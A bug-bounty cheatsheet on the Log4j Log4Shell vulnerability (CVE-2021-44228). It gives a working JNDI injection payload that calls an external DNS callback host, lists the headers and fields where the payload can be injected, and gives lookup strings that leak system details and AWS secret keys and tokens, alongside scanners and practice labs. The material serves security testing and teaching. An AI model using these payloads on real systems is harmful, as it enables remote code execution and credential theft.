Log4j Vulnerability Cheatsheet

Description

Java logging library, log4j, has an unauthenticated RCE vulnerability if a user-controlled string is logged. CVE-2021–44228

Affected versions - Apache log4j 2.0-beta9 ≤ 2.14.1

How It Works

Specially crafted payload is injected into Headers, Input Fields, or Query/Body parameters

https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}

1. You can use a service dnslog.cn to create your DNS subdomain for a test. Example: qwe3er.dnslog.cn

2. Use this subdomain to craft a payload and send it with the request. Check request to DNS service after some time for confirmation of successful callback

3. You should receive a similar request to DNS service (with Host & Java Version): jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn

Test Environments

You can use provided test environments to inspect the behavior of this vulnerability

• https://github.com/leonjza/log4jpwn
• https://github.com/christophetd/log4shell-vulnerable-app

Challenges & Labs (Rooms)

You can use created challenges, labs (rooms) for practice

• https://pentesterlab.com/exercises/log4j_rce/course
• https://tryhackme.com/room/solar

How To Identify (Services)

Use these websites to create DNS address (token) for payload

• https://canarytokens.org (Token Type: Log4Shell)
• https://app.interactsh.com
• https://dnslog.cn

How To Identify (Scanners)

Use these scanners to check if target website is vulnerable

• https://github.com/fullhunt/log4j-scan
• https://github.com/adilsoybali/Log4j-RCE-Scanner

List of Places where Payload can be Injected

Email header, Username, Password, E-mail address, Filename, Query/Body, File content, Document/Image EXIF, or inside of any of these Headers:

Authorization
Cache-Control
Cf-Connecting_ip
Client-Ip
Contact
Cookie
Forwarded-For-Ip
Forwarded-For
Forwarded
If-Modified-Since
Originating-Ip
Referer
True-Client-Ip
User-Agent
X-Api-Version
X-Client-Ip
X-Forwarded-For
X-Leakix
X-Originating-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-Ip
X-Wap-Profile
Authorization: Basic
Authorization: Bearer
Authorization: Oauth
Authorization: Token

What Information can be Extracted

${hostName}
${sys:user.name}
${sys:user.home}
${sys:user.dir}
${sys:java.home}
${sys:java.vendor}
${sys:java.version}
${sys:java.vendor.url}
${sys:java.vm.version}
${sys:java.vm.vendor}
${sys:java.vm.name}
${sys:os.name}
${sys:os.arch}
${sys:os.version}
${env:JAVA_VERSION}
${env:AWS_SECRET_ACCESS_KEY}
${env:AWS_SESSION_TOKEN}
${env:AWS_SHARED_CREDENTIALS_FILE}
${env:AWS_WEB_IDENTITY_TOKEN_FILE}
${env:AWS_PROFILE}
${env:AWS_CONFIG_FILE}
${env:AWS_ACCESS_KEY_ID}

Video Edition is available on

• YouTube #shorts - https://youtu.be/vPG4IX9xIkU
• Instagram - https://t.co/27uFm5f9Va
• TikTok - https://t.co/kW15YiLKHq

Static Version Shared On

• LinkedIn - https://t.co/bS7JndJ1yG
• Instagram - https://t.co/I6ivWbVDMp
• Twitter - https://lnkd.in/gr2tfgcx

That's all for now

1. Share the word about this article
2. Follow me @therceman

I tweet & write about Bug Bounty Hunting
Cheers, Happy Hunting 👍